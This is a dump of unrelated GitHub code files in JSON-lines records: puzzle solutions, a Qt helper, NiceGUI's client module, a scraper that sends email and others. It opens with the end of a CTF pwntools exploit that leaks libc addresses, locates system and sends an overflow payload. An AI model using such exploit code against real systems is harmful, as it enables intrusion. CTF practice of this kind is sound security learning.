address of puts\npattern = r\"0x[0-9a-f]+\"\nputs_addr = re.findall(pattern, res)[0]\nprint(f\"Address of `puts`: {puts_addr}\")\n\n# puts is 0x80ed0 offset from libc base\nlibc_addr = int(puts_addr, 16) - 0x80ED0\nlibc.address = libc_addr\nprint(f\"Address of libc base: {hex(libc_addr)}\")\n\nsys_addr = libc_addr + 0x050D60\nprint(f\"Address of `system`: {hex(sys_addr)}\")\n\nr.send(b\"1\\ny\\n\")\nr.send(b\"a\" * 60)\nrecv()\n\nr.send(b\"\\n3\\n\\n\")\nprint(recv())\n\nr.interactive()\n\nr.close()\n","repo_name":"zuna06/patriot-ctf","sub_path":"bookshelf/ym.py","file_name":"ym.py","file_ext":"py","file_size_in_byte":1325,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29954030746","text":"with open('Input.txt', mode='r', encoding='utf-8') as file:\r\n input = file.read().split('\\n')\r\n\r\ndef create_binary_str(method):\r\n\r\n binary_str = ''\r\n\r\n for i in range(len(input[0])):\r\n zeros = 0\r\n ones = 0\r\n for value in input:\r\n if value[i] == '0':\r\n zeros += 1\r\n elif value[i] == '1':\r\n ones += 1\r\n if (zeros > ones and method == 'mstCmn') or (ones > zeros and method == 'lstCmn'):\r\n binary_str = binary_str + '0'\r\n elif (ones > zeros and method == 'mstCmn') or (zeros > ones and method == 'lstCmn'):\r\n binary_str = binary_str + '1'\r\n\r\n return int(binary_str, 2)\r\n\r\ngamma_rate = create_binary_str('mstCmn')\r\nepsilon_rate = create_binary_str('lstCmn')\r\n\r\nprint(gamma_rate * epsilon_rate)\r\n","repo_name":"Ross117/Advent-of-Code-2021","sub_path":"AoC Day 3 Part 1.py","file_name":"AoC Day 3 Part 1.py","file_ext":"py","file_size_in_byte":811,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"21496216133","text":"n = int(input())\nmin = n + 1\ncount = 1\npos = [0 for _ in range(min)]\nnums = list(map(int, input().split()))\nfor i, num in enumerate(nums):\n pos[num] = i\nfor i in range(n):\n if pos[i+1] < pos[i]:\n count += 1\nprint(count)\n","repo_name":"rv02/YeetCode","sub_path":"CSES/sorting_and_searching/collecting_numbers.py","file_name":"collecting_numbers.py","file_ext":"py","file_size_in_byte":233,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"3546852287","text":"import math\n\ndef is_prime_number(x):\n # 2부터 x의 제곱근까지의 모든 수를 확인하며\n for i in range(2, int(math.sqrt(x)) + 1):\n # x가 해당 수로 나누어떨어진다면\n if x % i == 0:\n return False # 소수가 아님\n return True # 소수임\n\nn = int(input())\ndata = list(map(int, input().split()))\nans = []\n\nfor i in range(1, n+1):\n if is_prime_number(i) and i != 1:\n ans.append(data[i-1])\n\nprint(sum(ans))\n\n","repo_name":"wjddn1029/AlgorithmStudy","sub_path":"연습_D/career/practice_test6.py","file_name":"practice_test6.py","file_ext":"py","file_size_in_byte":474,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"20920061365","text":"# -*- coding: utf-8 -*-\n# gui/liststyle.py\n\nimport logging\nfrom QtCore import QFileInfo\nfrom QtGui import QPalette\nfrom QtWidgets import QWidget\n\n# required for svg graphics support\nfrom .qt import QtSvg, QtXml, pluginDirs\nfrom ..main import makeAbsolutePath\n\ndef makeAlternatingRowColorsTransparent(widget):\n palette = widget.palette()\n color = palette.color(QPalette.AlternateBase)\n color.setAlphaF(0.4)\n palette.setColor(QPalette.AlternateBase, color)\n widget.setPalette(palette)\n\ndef setBackgroundStyleSheet(widget, imgpath):\n assert isinstance(widget, 
QWidget)\n makeAlternatingRowColorsTransparent(widget.listWidget)\n stylesheet = \"\"\"\n #listWidget {{\n background-image: url({path});\n background-repeat: no-repeat;\n background-position: center center;\n background-attachment: fixed;\n background-color: {bgcol};\n }}\n \"\"\"\n # convert path to qt style formatting (separators, ...)\n imgpath = QFileInfo(makeAbsolutePath(imgpath)).absoluteFilePath()\n # also set background color of image to same used in GUI (covers dark mode)\n bgcol = widget.listWidget.palette().color(QPalette.Base)\n widget.setStyleSheet(stylesheet.format(path=imgpath, bgcol=bgcol.name()))\n\n# vim: set ts=4 sts=4 sw=4 tw=0:\n","repo_name":"BAMresearch/McDLS","sub_path":"src/mcsas/gui/liststyle.py","file_name":"liststyle.py","file_ext":"py","file_size_in_byte":1324,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"5"} +{"seq_id":"74667745753","text":"import smtk\nimport smtk.attribute\nimport smtk.testing\nimport smtk.view\n\n\nclass testModifyViewComponents(smtk.testing.TestCase):\n\n def setUp(self):\n self.attRsc = smtk.attribute.Resource.create()\n\n def testAddViewComponents(self):\n # Create an empty view\n testView = smtk.view.View.New('Instanced', 'testView')\n self.attRsc.addView(testView)\n # Test addChild() and details()\n attComp = testView.details().addChild(\n 'InstancedAttributes').addChild('Att')\n # Make sure attcomp and SameAttComp is a reference\n SameAttComp = attComp.setAttribute('Name', 'Foo')\n SameAttComp.setAttribute('Title', 'Bar')\n instanceIndex = testView.details().findChild('InstancedAttributes')\n if instanceIndex == -1:\n raise Exception('smtk.view.details() failed!')\n attIndex = testView.details().child(instanceIndex).findChild('Att')\n if attIndex == -1:\n raise Exception('smtk.view.component.addChild() failed!')\n # Grab the component again\n attCompAgain = testView.details().child(instanceIndex).child(attIndex)\n success = attCompAgain.attribute('Name')\n if not success:\n raise Exception('smtk.view.component.addChild() failed!')\n success = attCompAgain.attribute('Title')\n if not success:\n raise Exception('smtk.view.component.setAttribute() failed!')\n # Test unsetAttribute\n attCompJr = attComp.unsetAttribute('Title')\n Found = attComp.attribute('Title')\n if Found:\n raise Exception('smtk.view.component.unsetAttribute() failed!')\n attCompJr.setAttribute('Title', 'Foo')\n success = attComp.attribute('Title')\n if not success:\n raise Exception('smtk.view.component.unsetAttribute() failed!')\n\n # Test Child()\n attCompAgain.setAttribute('Type', 'Baz')\n attCompFinal = testView.details().child(instanceIndex).child(attIndex)\n success = attCompFinal.attribute('Type')\n if not success:\n raise Exception('smtk.view.component.Child() failed!')\n\n # Print all the attributes. 
Note pybind drops its const-ness so we do\n # not want it to return the attributes map by reference\n compAtts = attComp.attributes()\n print('Attributes in the component:')\n for att, value in compAtts.items():\n print('Attribute: {}, Value: {}'.format(att, value))\n\n\nif __name__ == '__main__':\n smtk.testing.process_arguments()\n smtk.testing.main()\n","repo_name":"Kitware/SMTK","sub_path":"smtk/view/testing/python/modifyViewComponents.py","file_name":"modifyViewComponents.py","file_ext":"py","file_size_in_byte":2555,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"5"} +{"seq_id":"31230651035","text":"# -*- coding: utf-8 -*-\n\nfrom typing import List, Dict\n\n\nclass StatDescriptionModel(object):\n def __init__(self, tag: str,\n name: Dict[str, str], description: Dict[str, str],\n upgradeable: bool, aptitudes: List[str]):\n self.tag = tag\n self.name = name\n self.description = description\n self.upgradeable = upgradeable\n self.aptitudes = aptitudes\n\n @classmethod\n def from_json(cls, data):\n return cls(**data)\n","repo_name":"KCherkasov/squat-toolbox","sub_path":"charlist/flyweights/models/stat_description_model.py","file_name":"stat_description_model.py","file_ext":"py","file_size_in_byte":489,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"36074116994","text":"from __future__ import annotations\n\nimport asyncio\nimport inspect\nimport time\nimport uuid\nfrom contextlib import contextmanager\nfrom pathlib import Path\nfrom typing import TYPE_CHECKING, Any, Awaitable, Callable, Dict, Iterable, Iterator, List, Optional, Union\n\nfrom fastapi import Request\nfrom fastapi.responses import Response\nfrom fastapi.templating import Jinja2Templates\n\nfrom nicegui import json\n\nfrom . 
import background_tasks, binding, core, helpers, outbox\nfrom .awaitable_response import AwaitableResponse\nfrom .dependencies import generate_resources\nfrom .element import Element\nfrom .favicon import get_favicon_url\nfrom .logging import log\nfrom .version import __version__\n\nif TYPE_CHECKING:\n from .page import page\n\ntemplates = Jinja2Templates(Path(__file__).parent / 'templates')\n\n\nclass Client:\n page_routes: Dict[Callable[..., Any], str] = {}\n \"\"\"Maps page builders to their routes.\"\"\"\n\n instances: Dict[str, Client] = {}\n \"\"\"Maps client IDs to clients.\"\"\"\n\n auto_index_client: Client\n \"\"\"The client that is used to render the auto-index page.\"\"\"\n\n def __init__(self, page: page, *, shared: bool = False) -> None:\n self.id = str(uuid.uuid4())\n self.created = time.time()\n self.instances[self.id] = self\n\n self.elements: Dict[int, Element] = {}\n self.next_element_id: int = 0\n self.is_waiting_for_connection: bool = False\n self.is_waiting_for_disconnect: bool = False\n self.environ: Optional[Dict[str, Any]] = None\n self.shared = shared\n self.on_air = False\n self._disconnect_task: Optional[asyncio.Task] = None\n\n with Element('q-layout', _client=self).props('view=\"hhh lpr fff\"').classes('nicegui-layout') as self.layout:\n with Element('q-page-container') as self.page_container:\n with Element('q-page'):\n self.content = Element('div').classes('nicegui-content')\n\n self.waiting_javascript_commands: Dict[str, Any] = {}\n\n self.head_html = ''\n self.body_html = ''\n\n self.page = page\n\n self.connect_handlers: List[Union[Callable[..., Any], Awaitable]] = []\n self.disconnect_handlers: List[Union[Callable[..., Any], Awaitable]] = []\n\n self._temporary_socket_id: Optional[str] = None\n\n @property\n def is_auto_index_client(self) -> bool:\n \"\"\"Return True if this client is the auto-index client.\"\"\"\n return self is self.auto_index_client\n\n @property\n def ip(self) -> Optional[str]:\n \"\"\"Return the IP address of the client, or None if the client is not connected.\"\"\"\n return self.environ['asgi.scope']['client'][0] if self.environ else None # pylint: disable=unsubscriptable-object\n\n @property\n def has_socket_connection(self) -> bool:\n \"\"\"Return True if the client is connected, False otherwise.\"\"\"\n return self.environ is not None\n\n def __enter__(self):\n self.content.__enter__()\n return self\n\n def __exit__(self, *_):\n self.content.__exit__()\n\n def build_response(self, request: Request, status_code: int = 200) -> Response:\n \"\"\"Build a FastAPI response for the client.\"\"\"\n prefix = request.headers.get('X-Forwarded-Prefix', request.scope.get('root_path', ''))\n elements = json.dumps({\n id: element._to_dict() for id, element in self.elements.items() # pylint: disable=protected-access\n })\n socket_io_js_query_params = {**core.app.config.socket_io_js_query_params, 'client_id': self.id}\n vue_html, vue_styles, vue_scripts, imports, js_imports = generate_resources(prefix, self.elements.values())\n return templates.TemplateResponse('index.html', {\n 'request': request,\n 'version': __version__,\n 'elements': elements.replace('&', '&')\n .replace('<', '<')\n .replace('>', '>')\n .replace('`', '`'),\n 'head_html': self.head_html,\n 'body_html': '\\n' + self.body_html + '\\n' + '\\n'.join(vue_html),\n 'vue_scripts': '\\n'.join(vue_scripts),\n 'imports': json.dumps(imports),\n 'js_imports': '\\n'.join(js_imports),\n 'quasar_config': json.dumps(core.app.config.quasar_config),\n 'title': self.page.resolve_title(),\n 
'viewport': self.page.resolve_viewport(),\n 'favicon_url': get_favicon_url(self.page, prefix),\n 'dark': str(self.page.resolve_dark()),\n 'language': self.page.resolve_language(),\n 'prefix': prefix,\n 'tailwind': core.app.config.tailwind,\n 'prod_js': core.app.config.prod_js,\n 'socket_io_js_query_params': socket_io_js_query_params,\n 'socket_io_js_extra_headers': core.app.config.socket_io_js_extra_headers,\n 'socket_io_js_transports': core.app.config.socket_io_js_transports,\n }, status_code, {'Cache-Control': 'no-store', 'X-NiceGUI-Content': 'page'})\n\n async def connected(self, timeout: float = 3.0, check_interval: float = 0.1) -> None:\n \"\"\"Block execution until the client is connected.\"\"\"\n self.is_waiting_for_connection = True\n deadline = time.time() + timeout\n while not self.has_socket_connection:\n if time.time() > deadline:\n raise TimeoutError(f'No connection after {timeout} seconds')\n await asyncio.sleep(check_interval)\n self.is_waiting_for_connection = False\n\n async def disconnected(self, check_interval: float = 0.1) -> None:\n \"\"\"Block execution until the client disconnects.\"\"\"\n if not self.has_socket_connection:\n await self.connected()\n self.is_waiting_for_disconnect = True\n while self.id in self.instances:\n await asyncio.sleep(check_interval)\n self.is_waiting_for_disconnect = False\n\n def run_javascript(self, code: str, *,\n respond: Optional[bool] = None, # DEPRECATED\n timeout: float = 1.0, check_interval: float = 0.01) -> AwaitableResponse:\n \"\"\"Execute JavaScript on the client.\n\n The client connection must be established before this method is called.\n You can do this by `await client.connected()` or register a callback with `client.on_connect(...)`.\n\n If the function is awaited, the result of the JavaScript code is returned.\n Otherwise, the JavaScript code is executed without waiting for a response.\n\n :param code: JavaScript code to run\n :param timeout: timeout in seconds (default: `1.0`)\n :param check_interval: interval in seconds to check for a response (default: `0.01`)\n\n :return: AwaitableResponse that can be awaited to get the result of the JavaScript code\n \"\"\"\n if respond is True:\n log.warning('The \"respond\" argument of run_javascript() has been removed. '\n 'Now the method always returns an AwaitableResponse that can be awaited. '\n 'Please remove the \"respond=True\" argument.')\n if respond is False:\n raise ValueError('The \"respond\" argument of run_javascript() has been removed. '\n 'Now the method always returns an AwaitableResponse that can be awaited. 
'\n 'Please remove the \"respond=False\" argument and call the method without awaiting.')\n\n request_id = str(uuid.uuid4())\n target_id = self._temporary_socket_id or self.id\n\n def send_and_forget():\n outbox.enqueue_message('run_javascript', {'code': code}, target_id)\n\n async def send_and_wait():\n outbox.enqueue_message('run_javascript', {'code': code, 'request_id': request_id}, target_id)\n deadline = time.time() + timeout\n while request_id not in self.waiting_javascript_commands:\n if time.time() > deadline:\n raise TimeoutError('JavaScript did not respond in time')\n await asyncio.sleep(check_interval)\n return self.waiting_javascript_commands.pop(request_id)\n\n return AwaitableResponse(send_and_forget, send_and_wait)\n\n def open(self, target: Union[Callable[..., Any], str], new_tab: bool = False) -> None:\n \"\"\"Open a new page in the client.\"\"\"\n path = target if isinstance(target, str) else self.page_routes[target]\n outbox.enqueue_message('open', {'path': path, 'new_tab': new_tab}, self.id)\n\n def download(self, url: str, filename: Optional[str] = None) -> None:\n \"\"\"Download a file from the given URL.\"\"\"\n outbox.enqueue_message('download', {'url': url, 'filename': filename}, self.id)\n\n def on_connect(self, handler: Union[Callable[..., Any], Awaitable]) -> None:\n \"\"\"Register a callback to be called when the client connects.\"\"\"\n self.connect_handlers.append(handler)\n\n def on_disconnect(self, handler: Union[Callable[..., Any], Awaitable]) -> None:\n \"\"\"Register a callback to be called when the client disconnects.\"\"\"\n self.disconnect_handlers.append(handler)\n\n def handle_handshake(self) -> None:\n \"\"\"Cancel pending disconnect task and invoke connect handlers.\"\"\"\n if self._disconnect_task:\n self._disconnect_task.cancel()\n self._disconnect_task = None\n for t in self.connect_handlers:\n self.safe_invoke(t)\n for t in core.app._connect_handlers: # pylint: disable=protected-access\n self.safe_invoke(t)\n\n def handle_disconnect(self) -> None:\n \"\"\"Wait for the browser to reconnect; invoke disconnect handlers if it doesn't.\"\"\"\n async def handle_disconnect() -> None:\n if self.page.reconnect_timeout is not None:\n delay = self.page.reconnect_timeout\n else:\n delay = core.app.config.reconnect_timeout # pylint: disable=protected-access\n await asyncio.sleep(delay)\n for t in self.disconnect_handlers:\n self.safe_invoke(t)\n for t in core.app._disconnect_handlers: # pylint: disable=protected-access\n self.safe_invoke(t)\n if not self.shared:\n self.delete()\n self._disconnect_task = background_tasks.create(handle_disconnect())\n\n def handle_event(self, msg: Dict) -> None:\n \"\"\"Forward an event to the corresponding element.\"\"\"\n with self:\n sender = self.elements.get(msg['id'])\n if sender:\n msg['args'] = [None if arg is None else json.loads(arg) for arg in msg.get('args', [])]\n if len(msg['args']) == 1:\n msg['args'] = msg['args'][0]\n sender._handle_event(msg) # pylint: disable=protected-access\n\n def handle_javascript_response(self, msg: Dict) -> None:\n \"\"\"Store the result of a JavaScript command.\"\"\"\n self.waiting_javascript_commands[msg['request_id']] = msg['result']\n\n def safe_invoke(self, func: Union[Callable[..., Any], Awaitable]) -> None:\n \"\"\"Invoke the potentially async function in the client context and catch any exceptions.\"\"\"\n try:\n if isinstance(func, Awaitable):\n async def func_with_client():\n with self:\n await func\n background_tasks.create(func_with_client())\n else:\n with self:\n result 
= func(self) if len(inspect.signature(func).parameters) == 1 else func()\n if helpers.is_coroutine_function(func):\n async def result_with_client():\n with self:\n await result\n background_tasks.create(result_with_client())\n except Exception as e:\n core.app.handle_exception(e)\n\n def remove_elements(self, elements: Iterable[Element]) -> None:\n \"\"\"Remove the given elements from the client.\"\"\"\n binding.remove(elements, Element)\n element_ids = [element.id for element in elements]\n for element_id in element_ids:\n del self.elements[element_id]\n for element in elements:\n element._handle_delete() # pylint: disable=protected-access\n element._deleted = True # pylint: disable=protected-access\n outbox.enqueue_delete(element)\n\n def remove_all_elements(self) -> None:\n \"\"\"Remove all elements from the client.\"\"\"\n self.remove_elements(self.elements.values())\n\n def delete(self) -> None:\n \"\"\"Delete a client and all its elements.\n\n If the global clients dictionary does not contain the client, its elements are still removed and a KeyError is raised.\n Normally this should never happen, but has been observed (see #1826).\n \"\"\"\n self.remove_all_elements()\n del Client.instances[self.id]\n\n @contextmanager\n def individual_target(self, socket_id: str) -> Iterator[None]:\n \"\"\"Use individual socket ID while in this context.\n\n This context is useful for limiting messages from the shared auto-index page to a single client.\n \"\"\"\n self._temporary_socket_id = socket_id\n yield\n self._temporary_socket_id = None\n\n @classmethod\n async def prune_instances(cls) -> None:\n \"\"\"Prune stale clients in an endless loop.\"\"\"\n while True:\n try:\n stale_clients = [\n client\n for client in cls.instances.values()\n if not client.shared and not client.has_socket_connection and client.created < time.time() - 60.0\n ]\n for client in stale_clients:\n client.delete()\n except Exception:\n # NOTE: make sure the loop doesn't crash\n log.exception('Error while pruning clients')\n await asyncio.sleep(10)\n","repo_name":"zauberzeug/nicegui","sub_path":"nicegui/client.py","file_name":"client.py","file_ext":"py","file_size_in_byte":14052,"program_lang":"python","lang":"en","doc_type":"code","stars":5894,"dataset":"github-code","pt":"5"} +{"seq_id":"74381359511","text":"import numpy as np\n\ndef gaussian(x, mu, var):\n p = 1/(2 * np.pi * var)**(x.size/2) * np.exp(-np.linalg.norm(mu-x)**2 / (2 * var))\n return p\n\n# problem parameters\np = np.array([0.5, 0.5])\nmu = np.array([-3, 2])\nvar = np.array([4, 4])\nx = np.array([0.2, -0.9, -1, 1.2, 1.8])\n\n# Calculation of E step\np1 = np.array([p[0] * gaussian(xi, mu[0], var[0]) for xi in x])\np2 = np.array([p[1] * gaussian(xi, mu[1], var[1]) for xi in x])\np_x_sum = p1 + p2\np1 /= p_x_sum\np2 /= p_x_sum\n\nprint('Posterior probabilities for the 5 points created by component 1 is:', p1)\n\n# Update step - M Step\np_stack = np.stack((p1, p2), -1)\np_cluster_sum = np.sum(p_stack, 0)\n\nmu = x @ p_stack / p_cluster_sum\np = p_cluster_sum / p1.size\nvar = np.sum(p_stack * (mu.reshape(1,-1) - x.reshape(-1,1))**2, 0) / (x[0].size * p_cluster_sum)\n\nprint('Updated cluster 1 parameters: mu: ', mu[0], ', p: ', p[0], ', var: ', var[0])\n\n\n\n\n","repo_name":"omryblum/MIT-ML-686-2022","sub_path":"CourseCalculation/Lecture_14_Calculations.py","file_name":"Lecture_14_Calculations.py","file_ext":"py","file_size_in_byte":901,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} 
+{"seq_id":"28830530816","text":"import json\nimport numpy as np\nfrom keras.callbacks import TensorBoard\nfrom data_prep import gen_cosine_amp_for_supervised as gen_testdata\nfrom data_prep import print_data, series_to_supervised\nfrom ufcnn import ufcnn_model_concat\n\nsequence_length = 64 # same as in Roni Mittelman's paper - this is 2 times 32 - a line in Ronis input contains 33 numbers, but 1 is time and is omitted\nfeatures = 1 # guess changed Ernst 20160301\nnb_filter = 150 # same as in Roni Mittelman's paper\nfilter_length = 5 # same as in Roni Mittelman's paper\noutput_dim = 1\nbatch_size = 128\n\n#cos, expected = gen_testdata(sequence_length*100)\n\nwith open('./ecto.json') as data_file:\n data = json.load(data_file)\n\nsell = np.array([float(d['sell']) for d in data])\nsell = np.insert(np.diff(sell), 0, 0)\nprint(sell[0:5])\nsell = sell.reshape(-1, 1)\nsell = series_to_supervised(sell)\n\ntrain = sell.values[:, 0]\nprint(train[0:5])\ntrain = train.reshape(-1, 1, 1)\ntrain = train[::-1]\n\n\nexpected = sell.values[:, 1]\nprint(expected[0:5])\nexpected = expected.reshape(-1, 1, 1)\nexpected = expected[::-1]\n\n\n","repo_name":"Winehorn/GW2-DeepPost","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":1116,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"39672220834","text":"import ssl\nimport smtplib\nfrom email.mime.multipart import MIMEMultipart\nfrom email.mime.text import MIMEText\nimport os\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport datetime as dt\n\n\ndef get_updates():\n URL = \"https://www.ouka.fi/oulu/villavictor/ajankohtaista\"\n # request the URL and parse the JSON\n page = requests.get(URL)\n page.raise_for_status() # raise exception if invalid response\n\n soup = BeautifulSoup(page.content, \"html.parser\")\n\n # Extraction, Clean up and Date formatting\n date_span = soup.find_all(\n 'span', {'class': 'metadata-entry metadata-publish-date'})\n publish_date_txt = [span.get_text().strip() for span in date_span]\n publish_date = [dt.datetime.strptime(\n dtm, '%d.%m.%Y').date() for dtm in publish_date_txt]\n\n # Extraction and Clean up of posts and link\n post_span = soup.find_all('header', {'class': 'ouka-ap-title-list-title'})\n posts = [span.get_text().strip() for span in post_span]\n links = [x.find('a', href=True)['href'] for x in post_span]\n\n df = pd.DataFrame(list(zip(publish_date, posts, links)),\n columns=['publish_date', 'Posts', 'Links'])\n\n # Extracting the posts that were published today\n df = df.loc[df.publish_date == dt.date.today()]\n df.reset_index(drop=True, inplace=True)\n\n matches = [\"alkeis1\", \"alkeis 1\", \"alkeiskurssi 1\"]\n if len(df) != 0:\n for i in range(len(df)):\n title = df['Posts'][i].lower()\n # return(any(x in title for x in matches))\n yesNo = any(x in title for x in matches)\n if yesNo == 1:\n return (title, df['Links'][i])\n else:\n return 0\n else:\n return(-1)\n\n\nif __name__ == \"__main__\":\n sender_email = os.environ['MAIL_USER']\n password = os.environ['MAIL_PASS']\n\n receiver_email = sender_email # I'm sending it to myself\n # receiver_list = ['email_1@email.com', 'email_2@gmail.com', email_3@mail.com]\n\n msg = MIMEMultipart()\n msg['From'] = sender_email\n\n # check for updates on the website\n latestUpdate = get_updates()\n\n if latestUpdate == -1:\n msg['To'] = receiver_email\n msg['Subject'] = 'No new posts today'\n html = \"\"\"\\\n \n \n
Hello!!\n        The page does not have any new posts. Enjoy your day.\n        \"\"\"\n    elif latestUpdate == 0:\n        msg['To'] = receiver_email\n        msg['Subject'] = 'Nothing important to report today'\n        html = 'Hello!! New post but NOT about Alkeis 1'\n    else:\n        postTitle = latestUpdate[0].title()\n        postLink = latestUpdate[1]\n        # msg['To'] = ','.join(receiver_list) # To send to multiple\n        msg['To'] = receiver_email\n        msg['Subject'] = 'New Post on Villa Victor'\n        html = \"\"\"\\\n        Hello!!\n        A new update has been posted on Villa Victor Website about Alkeis 1 course.\n        <a href=\"{postLink}\">{postTitle}</a>
\n \n \n \"\"\".format(**locals())\n\n msg_content = MIMEText(html, 'html')\n msg.attach(msg_content)\n\n # Create secure connection with server and send email\n context = ssl.create_default_context()\n with smtplib.SMTP_SSL(\"smtp.gmail.com\", 465, context=context) as server:\n server.login(sender_email, password)\n server.sendmail(sender_email, msg['To'].split(\",\"), msg.as_string())\n","repo_name":"avinashmalla/Scrape-and-Email","sub_path":"scrape.py","file_name":"scrape.py","file_ext":"py","file_size_in_byte":3560,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"29469352116","text":"# One-away - There are three types of edits that can be performed on strings. Insert a character, removed a character, or replaced a character\n# Given two strings, write a function to check if they are one edit away\n# Example Pale, Ple yields ture\n# Example Pale, Bake yields false\n\ndef testString(string1,string2):\n if len(string1)==len(string2):\n count=0\n for i in range(len(string1)):\n if string1[i]!=string2[i]:\n count+=1\n if count==2: #If they strings are the same length and more than two characters are different, it cannot be a one away\n return False\n return True\n elif abs(len(string1)-len(string2))==1:\n if len(string1)-len(string2)==-1:\n large_string=string2\n small_string=string1\n else:\n large_string=string1\n small_string=string2\n if string1[len(string1)-1]==string2[len(string2)-1] and string1[0]!=string2[0]:\n test = large_string[1:len(large_string)]==small_string #trim first character of large string\n return test\n if string1[0]==string2[0] and string1[len(string1)-1]!=string2[len(string2)-1]:\n test = large_string[0:len(large_string)-1]==small_string #trim last character of large string\n return test\n if string1[0]==string2[0] and string1[len(string1)-1]==string2[len(string2)-1]:\n j=1\n for i in large_string[1:len(large_string)-1]:\n if i!=small_string[j]:\n large_string = large_string[:j]+large_string[j+1:]\n test = large_string == small_string\n return test\n j+=1\n\n\nif testString(\"test\",\"tnot\"):\n print(\"It is a one away\")\nelse:\n print(\"It is not\")","repo_name":"LoganNissenson/CodingPractice","sub_path":"Problem 1.5.py","file_name":"Problem 1.5.py","file_ext":"py","file_size_in_byte":1786,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"5"} +{"seq_id":"74012407192","text":"from __future__ import print_function\nimport argparse\nimport time\nimport torch.nn as nn\nimport torch.backends.cudnn as cudnn\nfrom torch.autograd import Variable\nimport torch.utils.data as data\nimport torchvision.transforms as transforms\nfrom data_loader import SYSUData, RegDBData, LLCMData, TestData\nfrom data_manager import *\nfrom eval_metrics import eval_sysu, eval_regdb, eval_llcm\nfrom model import embed_net\nfrom utils import *\nimport pdb\nimport scipy.io\n\nparser = argparse.ArgumentParser(description='PyTorch Cross-Modality Training')\nparser.add_argument('--dataset', default='llcm', help='dataset name: regdb or sysu]')\nparser.add_argument('--lr', default=0.1 , type=float, help='learning rate, 0.00035 for adam')\nparser.add_argument('--optim', default='sgd', type=str, help='optimizer')\nparser.add_argument('--arch', default='resnet50', type=str, help='network baseline:resnet18 or resnet50')\nparser.add_argument('--resume', '-r', default='llcm_agw_p4_n8_lr_0.1_seed_0_best.t', type=str, help='resume from checkpoint')\nparser.add_argument('--test-only', action='store_true', 
help='test only')\nparser.add_argument('--model_path', default='save_model/', type=str, help='model save path')\nparser.add_argument('--save_epoch', default=20, type=int, metavar='s', help='save model every 10 epochs')\nparser.add_argument('--log_path', default='log/', type=str, help='log save path')\nparser.add_argument('--vis_log_path', default='log/vis_log/', type=str, help='log save path')\nparser.add_argument('--workers', default=4, type=int, metavar='N', help='number of data loading workers (default: 4)')\nparser.add_argument('--img_w', default=144, type=int, metavar='imgw', help='img width')\nparser.add_argument('--img_h', default=288, type=int, metavar='imgh', help='img height')\nparser.add_argument('--batch-size', default=8, type=int, metavar='B', help='training batch size')\nparser.add_argument('--test-batch', default=64, type=int, metavar='tb', help='testing batch size')\nparser.add_argument('--method', default='agw', type=str, metavar='m', help='method type: base or agw')\nparser.add_argument('--margin', default=0.3, type=float, metavar='margin', help='triplet loss margin')\nparser.add_argument('--num_pos', default=4, type=int, help='num of pos per identity in each modality')\nparser.add_argument('--trial', default=1, type=int, metavar='t', help='trial (only for RegDB dataset)')\nparser.add_argument('--seed', default=0, type=int, metavar='t', help='random seed')\nparser.add_argument('--gpu', default='0', type=str, help='gpu device ids for CUDA_VISIBLE_DEVICES')\nparser.add_argument('--mode', default='all', type=str, help='all or indoor for sysu')\nparser.add_argument('--tvsearch', action='store_true', help='whether thermal to visible search on RegDB')\nargs = parser.parse_args()\nos.environ['CUDA_VISIBLE_DEVICES'] = args.gpu\n\ndataset = args.dataset\nif dataset == 'sysu':\n data_path = './Datasets/SYSU-MM01/'\n n_class = 395\n test_mode = [1, 2]\nelif dataset =='regdb':\n data_path = './Datasets/RegDB/'\n n_class = 206\n test_mode = [2, 1]\nelif dataset =='llcm':\n data_path = './Datasets/LLCM/'\n n_class = 713\n test_mode = [1, 2] #[2, 1]: VIS to IR; [1, 2]: IR to VIS\n \ndevice = 'cuda' if torch.cuda.is_available() else 'cpu'\nbest_acc = 0 # best test accuracy\nstart_epoch = 0 \npool_dim = 2048\nprint('==> Building model..')\nnet = embed_net(n_class, dataset, arch=args.arch)\nnet.to(device) \ncudnn.benchmark = True\n\ncheckpoint_path = args.model_path\n\nif args.method =='id':\n criterion = nn.CrossEntropyLoss()\n criterion.to(device)\n\nprint('==> Loading data..')\n# Data loading code\nnormalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],std=[0.229, 0.224, 0.225])\ntransform_train = transforms.Compose([\n transforms.ToPILImage(),\n transforms.RandomCrop((args.img_h,args.img_w)),\n transforms.RandomHorizontalFlip(),\n transforms.ToTensor(),\n normalize,\n])\n\ntransform_test = transforms.Compose([\n transforms.ToPILImage(),\n transforms.Resize((args.img_h,args.img_w)),\n transforms.ToTensor(),\n normalize,\n])\n\nend = time.time()\n\ndef extract_gall_feat(gall_loader):\n net.eval()\n print ('Extracting Gallery Feature...')\n start = time.time()\n ptr = 0\n gall_feat_pool = np.zeros((ngall, pool_dim))\n gall_feat_fc = np.zeros((ngall, pool_dim))\n with torch.no_grad():\n for batch_idx, (input, label ) in enumerate(gall_loader):\n batch_num = input.size(0)\n input = Variable(input.cuda())\n feat_pool, feat_fc = net(input, input, test_mode[0])\n gall_feat_pool[ptr:ptr+batch_num,: ] = feat_pool.detach().cpu().numpy()\n gall_feat_fc[ptr:ptr+batch_num,: ] = 
